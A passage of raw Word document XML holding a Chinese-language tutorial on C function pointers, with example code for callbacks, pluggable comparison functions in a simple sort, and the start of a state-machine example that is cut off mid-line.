    <w:p w14:paraId="3E69DDF6" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:r>
        <w:t>ComparatorFuncPtr cmp = compare;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56563B4B" w14:textId="7E74F7A9" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4">
      <w:r>
        <w:t>int result = cmp(5, 3); // Calls compare(5, 3) using the function pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD1536C" w14:textId="77777777" w:rsidR="00F82FE4" w:rsidRDefault="00F82FE4" w:rsidP="00F82FE4"/>
    <w:p w14:paraId="07113DF1" w14:textId="11BFCE5F" w:rsidR="00F82FE4" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用场景</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F425811" w14:textId="77777777" w:rsidR="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="7924185C" w14:textId="7DC38B9A" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>回调函数</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Callback Functions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C77170" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>函数指针可以作为参数传递给另一个函数，通常用于回调机制。在某些场景下，比如排序、事件驱动程序或者信号处理，你可以将特定的函数通过函数指针传递给库函数，库函数在合适的时机调用你传递的函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1657C4CF" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例：使用函数指针作为回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025FB10" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1D61B1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3984B6" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA529E9" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="5E45A9C8" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>void callback(int result) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F4B34" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    printf("Callback called with result: %d\n", result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6144D2CB" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857ABD6" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="4667EE68" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:lastRenderedPageBreak/>
        <w:t>void compute(int a, int b, void (*callbackFunc)(int)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31F86E" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    int sum = a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441455F9" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    callbackFunc(sum);  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>调用传入的回调函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B330C45" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A9299" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="2386E820" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0983E6B9" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    compute(3, 4, callback);  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>传入</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve"> callback </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>函数指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24370B8B" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2A025" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86A4AD" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>compute</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>函数接收一个函数指针参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve"> callbackFunc</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>，然后在合适的时候调用这个函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376856CB" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>实现策略模式或动态函数调用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D66A56" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>函数指针可以让你在程序运行时选择不同的函数来执行相同的任务。这在实现不同的策略或行为时非常有用，比如不同的排序规则、比较函数、或者动态处理不同类型的数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA2EC0" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例：不同的比较函数传递给排序算法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A0367E" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E576933" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6B92CE" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEBDB67" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="624CCDD7" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>比较函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37819FA0" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>int ascending(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D593E5" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    return a - b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569778B4" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFE7A4C" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="3CA6651D" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>int descending(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5681E984" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    return b - a;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E860F1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDBDE48" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="76EB5D19" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>使用函数指针的通用排序函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5F8C7B" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>void sort(int* arr, int size, int (*compare)(int, int)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D2305" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    for (int i = 0; i &lt; size - 1; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11557CF1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">        for (int j = i + 1; j &lt; size; j++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A6E26D" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">            if (compare(arr[i], arr[j]) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78491DE6" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">                int temp = arr[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D0A80" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">                arr[i] = arr[j];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1758936A" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">                arr[j] = temp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C04DA" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F2F3A4" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1879A941" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5EF1D1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6F922D" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="3247AB7B" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:lastRenderedPageBreak/>
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028A4D27" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    int arr[] = {5, 2, 9, 1, 5, 6};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBE7EE1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    int size = sizeof(arr) / sizeof(arr[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D162993" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645C0D9" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    sort(arr, size, ascending);  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>使用升序比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D041383" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    for (int i = 0; i &lt; size; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706D316C" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">        printf("%d ", arr[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280DFC37" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9186BF" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    printf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EB3323" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="5215B92E" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    sort(arr, size, descending);  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>使用降序比较</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266DF008" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    for (int i = 0; i &lt; size; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E1FF9" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">        printf("%d ", arr[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673D6EB8" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACD6BD3" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    printf("\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE5577" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="3C11B1F0" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    return 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE419D5" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFCB76" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>sort</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>函数通过函数指针参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve"> compare </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>可以根据需要选择不同的比较方式来排序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12ED217F" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>状态机</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (State Machines)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2ABE63" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>函数指针可以用于实现有限状态机（</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>FSM</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>），通过状态和事件之间的映射，调用不同的函数。每个状态可以通过函数指针指向不同的处理逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D69DC1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>示例：简单的状态机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6EBB06" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F099AB6" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E81278A" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD6906F" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="416FA7C0" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>typedef void (*StateFunc)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738337C7" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="0BFFD4FE" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>void stateA() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709AC5F3" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    printf("In State A\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8E586" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767A3565" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="495F5D4D" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>void stateB() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8B2551" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    printf("In State B\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7723862A" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DEEF1F" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="0B884777" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>void stateC() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062A537C" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    printf("In State C\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D178D1" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F14A951" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="76B05586" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CDF25C" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    StateFunc currentState = stateA;  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>初始状态为</w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D796DA" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73"/>
    <w:p w14:paraId="71C30475" w14:textId="77777777" w:rsidR="00837D73" w:rsidRPr="00837D73" w:rsidRDefault="00837D73" w:rsidP="00837D73">
      <w:r w:rsidRPr="00837D73">
        <w:t xml:space="preserve">    currentState();  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00837D73">
